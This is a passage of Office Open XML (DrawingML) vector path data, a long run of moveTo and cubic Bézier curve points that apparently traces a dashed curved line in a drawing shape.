                    <a:pt x="1098" y="8"/>
                    <a:pt x="1098" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1058" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1062" y="8"/>
                    <a:pt x="1065" y="8"/>
                    <a:pt x="1069" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1072" y="8"/>
                    <a:pt x="1075" y="8"/>
                    <a:pt x="1078" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1080" y="8"/>
                    <a:pt x="1082" y="6"/>
                    <a:pt x="1082" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1082" y="2"/>
                    <a:pt x="1080" y="0"/>
                    <a:pt x="1078" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="0"/>
                    <a:pt x="1072" y="0"/>
                    <a:pt x="1069" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1065" y="0"/>
                    <a:pt x="1061" y="0"/>
                    <a:pt x="1058" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1056" y="0"/>
                    <a:pt x="1054" y="2"/>
                    <a:pt x="1054" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1054" y="6"/>
                    <a:pt x="1056" y="8"/>
                    <a:pt x="1058" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1018" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1025" y="9"/>
                    <a:pt x="1031" y="9"/>
                    <a:pt x="1038" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1040" y="8"/>
                    <a:pt x="1042" y="6"/>
                    <a:pt x="1042" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1042" y="2"/>
                    <a:pt x="1040" y="0"/>
                    <a:pt x="1038" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="1"/>
                    <a:pt x="1024" y="1"/>
                    <a:pt x="1018" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1015" y="1"/>
                    <a:pt x="1014" y="3"/>
                    <a:pt x="1014" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1014" y="7"/>
                    <a:pt x="1016" y="9"/>
                    <a:pt x="1018" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="978" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="985" y="11"/>
                    <a:pt x="991" y="11"/>
                    <a:pt x="998" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1000" y="10"/>
                    <a:pt x="1002" y="8"/>
                    <a:pt x="1002" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1002" y="4"/>
                    <a:pt x="1000" y="2"/>
                    <a:pt x="998" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="991" y="3"/>
                    <a:pt x="984" y="3"/>
                    <a:pt x="977" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="4"/>
                    <a:pt x="974" y="6"/>
                    <a:pt x="974" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="974" y="10"/>
                    <a:pt x="976" y="12"/>
                    <a:pt x="978" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="938" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="945" y="15"/>
                    <a:pt x="952" y="14"/>
                    <a:pt x="958" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="960" y="13"/>
                    <a:pt x="962" y="11"/>
                    <a:pt x="962" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="962" y="7"/>
                    <a:pt x="960" y="5"/>
                    <a:pt x="957" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="951" y="6"/>
                    <a:pt x="944" y="7"/>
                    <a:pt x="937" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="8"/>
                    <a:pt x="934" y="10"/>
                    <a:pt x="934" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="15"/>
                    <a:pt x="936" y="16"/>
                    <a:pt x="938" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="899" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="905" y="20"/>
                    <a:pt x="912" y="19"/>
                    <a:pt x="919" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="921" y="18"/>
                    <a:pt x="922" y="16"/>
                    <a:pt x="922" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="922" y="12"/>
                    <a:pt x="920" y="10"/>
                    <a:pt x="918" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911" y="11"/>
                    <a:pt x="904" y="12"/>
                    <a:pt x="898" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="14"/>
                    <a:pt x="894" y="16"/>
                    <a:pt x="894" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="20"/>
                    <a:pt x="897" y="22"/>
                    <a:pt x="899" y="21"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="860" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="866" y="27"/>
                    <a:pt x="873" y="26"/>
                    <a:pt x="879" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="24"/>
                    <a:pt x="883" y="22"/>
                    <a:pt x="883" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="882" y="18"/>
                    <a:pt x="880" y="17"/>
                    <a:pt x="878" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="18"/>
                    <a:pt x="865" y="19"/>
                    <a:pt x="858" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="856" y="21"/>
                    <a:pt x="855" y="23"/>
                    <a:pt x="855" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="28"/>
                    <a:pt x="858" y="29"/>
                    <a:pt x="860" y="29"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="821" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="36"/>
                    <a:pt x="834" y="34"/>
                    <a:pt x="840" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="842" y="32"/>
                    <a:pt x="844" y="30"/>
                    <a:pt x="843" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="26"/>
                    <a:pt x="841" y="24"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="832" y="26"/>
                    <a:pt x="825" y="28"/>
                    <a:pt x="819" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="30"/>
                    <a:pt x="815" y="32"/>
                    <a:pt x="816" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="36"/>
                    <a:pt x="819" y="38"/>
                    <a:pt x="821" y="37"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="782" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="45"/>
                    <a:pt x="795" y="44"/>
                    <a:pt x="801" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="803" y="41"/>
                    <a:pt x="805" y="39"/>
                    <a:pt x="804" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="804" y="35"/>
                    <a:pt x="801" y="34"/>
                    <a:pt x="799" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="793" y="36"/>
                    <a:pt x="786" y="38"/>
                    <a:pt x="780" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="40"/>
                    <a:pt x="777" y="42"/>
                    <a:pt x="777" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="47"/>
                    <a:pt x="780" y="48"/>
                    <a:pt x="782" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="782" y="47"/>
                    <a:pt x="782" y="47"/>
                    <a:pt x="782" y="47"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="744" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="750" y="57"/>
                    <a:pt x="757" y="55"/>
                    <a:pt x="763" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="52"/>
                    <a:pt x="766" y="50"/>
                    <a:pt x="766" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="46"/>
                    <a:pt x="763" y="44"/>
                    <a:pt x="761" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754" y="47"/>
                    <a:pt x="748" y="49"/>
                    <a:pt x="741" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="52"/>
                    <a:pt x="738" y="54"/>
                    <a:pt x="739" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="740" y="58"/>
                    <a:pt x="742" y="59"/>
                    <a:pt x="744" y="59"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="706" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="712" y="69"/>
                    <a:pt x="719" y="67"/>
                    <a:pt x="725" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="64"/>
                    <a:pt x="728" y="62"/>
                    <a:pt x="727" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="58"/>
                    <a:pt x="724" y="57"/>
                    <a:pt x="722" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="60"/>
                    <a:pt x="710" y="62"/>
                    <a:pt x="703" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="65"/>
                    <a:pt x="700" y="67"/>
                    <a:pt x="701" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="702" y="71"/>
                    <a:pt x="704" y="72"/>
                    <a:pt x="706" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="72"/>
                    <a:pt x="706" y="72"/>
                    <a:pt x="706" y="72"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="669" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="675" y="83"/>
                    <a:pt x="681" y="81"/>
                    <a:pt x="687" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="690" y="78"/>
                    <a:pt x="691" y="75"/>
                    <a:pt x="690" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="71"/>
                    <a:pt x="687" y="70"/>
                    <a:pt x="685" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="678" y="74"/>
                    <a:pt x="672" y="76"/>
                    <a:pt x="666" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="79"/>
                    <a:pt x="663" y="82"/>
                    <a:pt x="664" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="665" y="86"/>
                    <a:pt x="667" y="87"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                    <a:pt x="669" y="86"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="632" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="638" y="99"/>
                    <a:pt x="644" y="96"/>
                    <a:pt x="651" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="93"/>
                    <a:pt x="654" y="90"/>
                    <a:pt x="653" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="652" y="86"/>
                    <a:pt x="649" y="85"/>
                    <a:pt x="647" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="641" y="89"/>
                    <a:pt x="635" y="92"/>
                    <a:pt x="629" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="95"/>
                    <a:pt x="626" y="98"/>
                    <a:pt x="627" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="628" y="102"/>
                    <a:pt x="630" y="103"/>
                    <a:pt x="632" y="102"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="596" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="116"/>
                    <a:pt x="608" y="113"/>
                    <a:pt x="614" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="109"/>
                    <a:pt x="617" y="107"/>
                    <a:pt x="616" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="103"/>
                    <a:pt x="613" y="102"/>
                    <a:pt x="611" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="605" y="106"/>
                    <a:pt x="599" y="109"/>
                    <a:pt x="593" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="113"/>
                    <a:pt x="590" y="115"/>
                    <a:pt x="591" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592" y="119"/>
                    <a:pt x="594" y="120"/>
                    <a:pt x="596" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="596" y="119"/>
                    <a:pt x="596" y="119"/>
                    <a:pt x="596" y="119"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="561" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="567" y="134"/>
                    <a:pt x="573" y="131"/>
                    <a:pt x="579" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="127"/>
                    <a:pt x="581" y="124"/>
                    <a:pt x="580" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="120"/>
                    <a:pt x="577" y="120"/>
                    <a:pt x="575" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="124"/>
                    <a:pt x="563" y="127"/>
                    <a:pt x="557" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="131"/>
                    <a:pt x="555" y="134"/>
                    <a:pt x="556" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="137"/>
                    <a:pt x="559" y="138"/>
                    <a:pt x="561" y="137"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="153"/>
                    <a:pt x="538" y="150"/>
                    <a:pt x="544" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="146"/>
                    <a:pt x="546" y="143"/>
                    <a:pt x="545" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="139"/>
                    <a:pt x="542" y="139"/>
                    <a:pt x="540" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="143"/>
                    <a:pt x="528" y="147"/>
                    <a:pt x="523" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="151"/>
                    <a:pt x="520" y="154"/>
                    <a:pt x="521" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="522" y="157"/>
                    <a:pt x="525" y="158"/>
                    <a:pt x="527" y="157"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="178"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="174"/>
                    <a:pt x="504" y="171"/>
                    <a:pt x="510" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="166"/>
                    <a:pt x="512" y="164"/>
                    <a:pt x="511" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="160"/>
                    <a:pt x="507" y="159"/>
                    <a:pt x="505" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="164"/>
                    <a:pt x="494" y="168"/>
                    <a:pt x="488" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="172"/>
                    <a:pt x="486" y="175"/>
                    <a:pt x="487" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="179"/>
                    <a:pt x="491" y="179"/>
                    <a:pt x="493" y="178"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="465" y="196"/>
                    <a:pt x="471" y="193"/>
                    <a:pt x="476" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="188"/>
                    <a:pt x="479" y="185"/>
                    <a:pt x="477" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="181"/>
                    <a:pt x="474" y="181"/>
                    <a:pt x="472" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="186"/>
                    <a:pt x="461" y="190"/>
                    <a:pt x="455" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="195"/>
                    <a:pt x="453" y="197"/>
                    <a:pt x="454" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="201"/>
                    <a:pt x="458" y="201"/>
                    <a:pt x="460" y="200"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="224"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="220"/>
                    <a:pt x="438" y="216"/>
                    <a:pt x="444" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="210"/>
                    <a:pt x="446" y="208"/>
                    <a:pt x="444" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="204"/>
                    <a:pt x="441" y="204"/>
                    <a:pt x="439" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="209"/>
                    <a:pt x="428" y="213"/>
                    <a:pt x="423" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="219"/>
                    <a:pt x="421" y="221"/>
                    <a:pt x="422" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="225"/>
                    <a:pt x="426" y="225"/>
                    <a:pt x="428" y="224"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="248"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="244"/>
                    <a:pt x="407" y="240"/>
                    <a:pt x="412" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="235"/>
                    <a:pt x="414" y="232"/>
                    <a:pt x="413" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="229"/>
                    <a:pt x="409" y="228"/>
                    <a:pt x="407" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="234"/>
                    <a:pt x="396" y="238"/>
                    <a:pt x="391" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="244"/>
                    <a:pt x="389" y="246"/>
                    <a:pt x="391" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="250"/>
                    <a:pt x="395" y="250"/>
                    <a:pt x="396" y="248"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="274"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="270"/>
                    <a:pt x="376" y="266"/>
                    <a:pt x="381" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="260"/>
                    <a:pt x="383" y="257"/>
                    <a:pt x="382" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="254"/>
                    <a:pt x="378" y="254"/>
                    <a:pt x="376" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="259"/>
                    <a:pt x="366" y="264"/>
                    <a:pt x="361" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="270"/>
                    <a:pt x="359" y="272"/>
                    <a:pt x="360" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="276"/>
                    <a:pt x="364" y="276"/>
                    <a:pt x="366" y="274"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="301"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="297"/>
                    <a:pt x="346" y="292"/>
                    <a:pt x="351" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="286"/>
                    <a:pt x="353" y="284"/>
                    <a:pt x="351" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="280"/>
                    <a:pt x="347" y="280"/>
                    <a:pt x="346" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="286"/>
                    <a:pt x="336" y="291"/>
                    <a:pt x="331" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="297"/>
                    <a:pt x="329" y="300"/>
                    <a:pt x="331" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="303"/>
                    <a:pt x="335" y="303"/>
                    <a:pt x="337" y="301"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="329"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="325"/>
                    <a:pt x="318" y="320"/>
                    <a:pt x="322" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="314"/>
                    <a:pt x="324" y="311"/>
                    <a:pt x="322" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="308"/>
                    <a:pt x="318" y="308"/>
                    <a:pt x="317" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="314"/>
                    <a:pt x="307" y="319"/>
                    <a:pt x="303" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="325"/>
                    <a:pt x="301" y="328"/>
                    <a:pt x="303" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="331"/>
                    <a:pt x="307" y="331"/>
                    <a:pt x="308" y="329"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="358"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="354"/>
                    <a:pt x="290" y="349"/>
                    <a:pt x="295" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="342"/>
                    <a:pt x="296" y="340"/>
                    <a:pt x="294" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="337"/>
                    <a:pt x="290" y="337"/>
                    <a:pt x="289" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="343"/>
                    <a:pt x="280" y="348"/>
                    <a:pt x="275" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="355"/>
                    <a:pt x="274" y="357"/>
                    <a:pt x="275" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="360"/>
                    <a:pt x="280" y="360"/>
                    <a:pt x="281" y="358"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="389"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="384"/>
                    <a:pt x="263" y="378"/>
                    <a:pt x="268" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="372"/>
                    <a:pt x="269" y="369"/>
                    <a:pt x="267" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="366"/>
                    <a:pt x="263" y="367"/>
                    <a:pt x="262" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="373"/>
                    <a:pt x="253" y="378"/>
                    <a:pt x="249" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="385"/>
                    <a:pt x="248" y="388"/>
                    <a:pt x="249" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="391"/>
                    <a:pt x="253" y="390"/>
                    <a:pt x="255" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="389"/>
                    <a:pt x="255" y="389"/>
                    <a:pt x="255" y="389"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="420"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="414"/>
                    <a:pt x="238" y="409"/>
                    <a:pt x="242" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="402"/>
                    <a:pt x="243" y="400"/>
                    <a:pt x="242" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="397"/>
                    <a:pt x="237" y="397"/>
                    <a:pt x="236" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="404"/>
                    <a:pt x="228" y="410"/>
                    <a:pt x="224" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="417"/>
                    <a:pt x="222" y="419"/>
                    <a:pt x="224" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="422"/>
                    <a:pt x="228" y="421"/>
                    <a:pt x="230" y="420"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="452"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="446"/>
                    <a:pt x="214" y="441"/>
                    <a:pt x="218" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="434"/>
                    <a:pt x="219" y="431"/>
                    <a:pt x="217" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="429"/>
                    <a:pt x="213" y="429"/>
                    <a:pt x="211" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="436"/>
                    <a:pt x="203" y="442"/>
                    <a:pt x="199" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="449"/>
                    <a:pt x="199" y="451"/>
                    <a:pt x="200" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="454"/>
                    <a:pt x="205" y="454"/>
                    <a:pt x="206" y="452"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="479"/>
                    <a:pt x="191" y="474"/>
                    <a:pt x="194" y="468"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="466"/>
                    <a:pt x="195" y="464"/>
                    <a:pt x="193" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="461"/>
                    <a:pt x="189" y="462"/>
                    <a:pt x="188" y="464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="469"/>
                    <a:pt x="180" y="475"/>
                    <a:pt x="177" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="482"/>
                    <a:pt x="176" y="485"/>
                    <a:pt x="178" y="486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="487"/>
